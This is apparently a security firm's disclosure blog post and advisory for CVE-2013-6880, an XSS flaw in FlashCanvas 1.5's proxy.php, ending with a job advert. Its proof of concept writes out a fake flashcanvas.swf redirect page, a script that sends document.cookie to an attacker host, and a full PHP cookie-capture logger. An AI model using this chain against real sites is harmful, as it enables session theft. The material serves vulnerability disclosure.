CVE-2013-6880 Proof of Concept

Marc Wickenden recently discovered a security issue within FlashCanvas 1.5 that could lead to a number of issues, such as cross-site scripting. The issue has been assigned CVE number 2013-6880 and the vendor has now released a fix for the issue, which can be found here. In this blog post we take a closer look at the issue and the proof of concept that shows how this issue can be used to steal session tokens.

 

Vulnerable code

The issue exists because the proxy.php script does not adequately verify the Referer header before requesting (via curl) the remote URL specified in the ‘url’ GET parameter and rendering it.

Within the proxy.php file the offending code is:

if (!preg_match('#/flash\d*canvas\.swf$#', $_SERVER['HTTP_REFERER'])) {

 

Creating the exploit

In order to exploit this issue the user needs to already be logged in to the target site and the attacker needs control of a website that can serve a page ending in /flashcanvas.swf

Our malicious /flashcanvas.swf makes a call to the vulnerable proxy.php on the remote site. An attacker entices a victim user to click on a malicious link. This makes a request, for example via a redirect, to the vulnerable proxy.php at the target site with the Referer set to a passable value. The proxy.php fetches the requested target URL and renders this in the context of the target site. Page rewrite, script execution, you name it, it becomes possible from this point.

 

POC

We have generated a POC to prove this and can use the flaw to steal session cookies of a victim under the following scenario. In order to exploit this issue the attacker needs control of a website (lets call this delivery.com), that can serve a page ending in /flashcanvas.swf

We then use the following code to make a call to the vulnerable proxy.php on the remote site (lets call this target.com) and redirect the user to our evil site (evil.com). We used a completely separate host in order to ensure this was cross-domain.

On delivery.com we need the following:

-- flashcanvas.swf
 <!DOCTYPE html>
 <html>
 <head>
 <title>CVE 2013 6880 POC</title>
 <meta http-equiv="refresh" content="1;http://www.target.com/FlashCanvas/proxy.php?url=http://evil.com/xss.html">
 </head>
 <body>
 <p>Redirecting...</p>
 </body>
 </html>
--

On the evil.com site our script looks like this:
<script>location.href = 'http://delivery.com/capture.php?cookie='+document.cookie;</script>

The capture.php file on delivery.com is used to record and print out the information sent to the page. It is also included in the access logs of course. For completeness the capture.php is:

<?php
$date = date("dmY");
$timestamp = date("D M j G:i:s T Y");
$collectionfile = "/tmp/collection.$date";
$fh = fopen($collectionfile, "a");
$ip = $_SERVER['REMOTE_ADDR'];
fwrite($fh, "== $timestamp / $ip ==\n");
?>
<html>
<body>
<?php
if (isset($_GET)) {
 fwrite($fh, "== GET ==\n");
 foreach ($_GET as $k => $v) {
 $arr = explode(";", $v);
 foreach ($arr as $vv) {
 $vals = explode("=", $vv);
 print "<p>$vals[0]: $vals[1]</p>";
 }
 fwrite($fh, "$k:$v\n");
 }
}
if (isset($_POST)) {
 fwrite($fh, "== POST ==\n");
 foreach ($_POST as $k => $v) {
 fwrite($fh, "$k:$v\n");
 print "$k: $v\n";
 }
}
fclose($fh);
?>
</body>
</html>

 

Summary

In summary, an attacker entices a victim user to click on the malicious link (http://delivery.com/flashcanvas.swf). This makes a request, in our case we used a redirect to the vulnerable proxy.php at the target site with the Referer set to a passable value. The proxy.php fetches the requested target URL (http://evil.com/xss.html) and renders this in the context of the target.com site, including script execution and DOM functionality.

 

Note

By default, under Apache the .swf extension will be served as Shockwave Flash. We require this to be served as a page, so this requires the following configuration changes on the evil.com webserver:

Comment out the following line on /etc/mime.types:

#application/x-shockwave-flash swf swfl

In your apache configuration, change the following file /etc/apache2/mods-enabled/mime.conf and add:

AddType text/html .swf

Don’t forget to reload apache.

CVE-2013-6880 FlashCanvas proxy.php XSS Vulnerability

Advisory Information

Title: FlashCanvas proxy.php XSS Vulnerability

Date published: 11 December 2013

Reference: CVE-2013-6880

Advisory Summary

Script does not adequately verify the Referer header before requesting (via curl) the remote URL specified in the ‘url’ GET parameter and rendering it.

Vendor

FlashCanvas.net <http://flashcanvas.net/>

Affected Software

FlashCanvas 1.5 and possibly older.

FlashCanvas is also used in other software frameworks such as WebShims, therefore the affected software maybe wider.

Description of Issue

The issue exists because the proxy.php script does not adequately verify the Referer header before requesting (via curl) the remote URL specified in the ‘url’ GET parameter and rendering it. This leads to some interesting possibilities, the one proved being cross-site scripting. More technical detail can be found in the following blog post.

Fix

We would recommend updating to version 1.6

Graduate Junior Security Tester Training and Development

As part of our on-going development, 7 Elements is looking to take on another Junior Security Tester in the summer of 2014. Through our dedicated Graduate Junior Security Tester Training and Development Plan they will gain the skills and experience necessary to become an independent, effective and highly skilled manual security tester. More information on this vacancy can be found on our careers page.